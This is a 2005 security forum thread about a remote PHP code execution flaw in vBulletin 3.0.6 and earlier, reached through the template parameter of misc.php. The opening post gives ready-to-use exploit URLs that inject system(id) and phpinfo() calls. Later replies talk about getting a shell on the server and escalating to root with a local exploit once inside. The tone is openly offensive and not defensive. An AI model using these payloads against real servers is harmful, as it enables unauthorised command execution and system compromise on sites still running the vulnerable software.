 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 119
 Members: 0
 Total: 119
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
vBulletin 3.0.6 and prior versions Exec commands in server |
|
 Posted: Wed Feb 23, 2005 2:39 pm |
 |
|
| LINUX |
| Moderator |
 |
|
| Joined: May 24, 2004 |
| Posts: 404 |
| Location: Caiman |
|
|
 |
|
 |
|
vBulletin Version(s): 3.0.6 and prior versions
in the processing of template names. A remote user can execute PHP commands in certain cases.
If the 'Add Template Name in HTML Comments' option is enabled (which is not the default configuration and is not recommended by the vendor for use in a production environment), a remote user can submit PHP code in the 'template' parameter in 'misc.php'
Real Life code exploit
| Code: | | http://[target]//forum/misc.php?do=page&template={${system(id)}} |
| Code: | | http://[target]//forum/misc.php?do=page&template={${phpinfo()}} |
www.sosvulnerable.net - svsecurity@gmail.com |
|
|
|
|
| Posted: Wed Feb 23, 2005 4:40 pm |
|
|
| Alkaen |
| Regular user |
 |
|
| Joined: Feb 16, 2005 |
| Posts: 5 |
| Location: Bahrain - Aldair |
|
|
|
|
|
|
Thanx dude
& wait alot of exploit in vBulletin Version 3.0.6
Alkaen.. |
|
|
|
|
| Posted: Wed Feb 23, 2005 9:47 pm |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Thu Feb 24, 2005 10:43 am |
|
|
| Zeelock |
| Active user |
 |
|
| Joined: Jan 27, 2005 |
| Posts: 29 |
| Location: Where stars come out at night |
|
|
|
|
|
|
|
_________________
If it seems to be impossible, just step up your level! |
|
|
|
| Posted: Thu Feb 24, 2005 4:07 pm |
|
|
| HaCkZataN |
| Regular user |
|
|
| Joined: Feb 23, 2005 |
| Posts: 11 |
|
|
|
|
|
|
|
| if the server has SAFE MODE ON mmm i dont think that will be useful |
|
|
|
|
| Posted: Thu Mar 24, 2005 4:22 pm |
|
|
| octane |
| Beginner |
 |
|
| Joined: Mar 24, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
| cant you like execute a small shell on the server? if its running windows for example? |
|
|
|
|
| Posted: Fri Mar 25, 2005 12:56 pm |
|
|
| Injector |
| Active user |
|
|
| Joined: Dec 29, 2004 |
| Posts: 49 |
|
|
|
|
|
|
|
| octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
|
|
|
|
| Posted: Fri Mar 25, 2005 1:22 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| Zeelock wrote: |
Made by Pokleyzz |
pokyleyzz WAS HERE !!!
heuheueue |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Fri Mar 25, 2005 2:07 pm |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| HaCkZataN wrote: | | if the server has SAFE MODE ON mmm i dont think that will be useful |
for further information we cpuld look php manual (good if u have compiled html (.chm)) then u could see what function restriction by safe_mode
 |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Sat Mar 26, 2005 3:20 pm |
|
|
| octane |
| Beginner |
|
|
| Joined: Mar 24, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
| Injector wrote: | | octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
so what good does this exploit do if you cant get root  |
|
|
|
|
| Posted: Sat Mar 26, 2005 3:34 pm |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| octane wrote: | | Injector wrote: | | octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
so what good does this exploit do if you cant get root |
at least you inside the machine 
after that USE your brain :LOL: |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
| Posted: Tue Mar 29, 2005 8:53 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| octane wrote: | | Injector wrote: | | octane wrote: | | cant you like execute a small shell on the server? if its running windows for example? |
You cant execute simple commands like ls, pwd etc. but thats pretty much it
especially that vbulletin is secure you wont really go far with that exploit |
so what good does this exploit do if you cant get root |
Then you need good local root exploit |
|
|
|
|
| Posted: Mon Jul 18, 2005 10:38 am |
|
|
| logan |
| Beginner |
|
|
| Joined: Jul 10, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
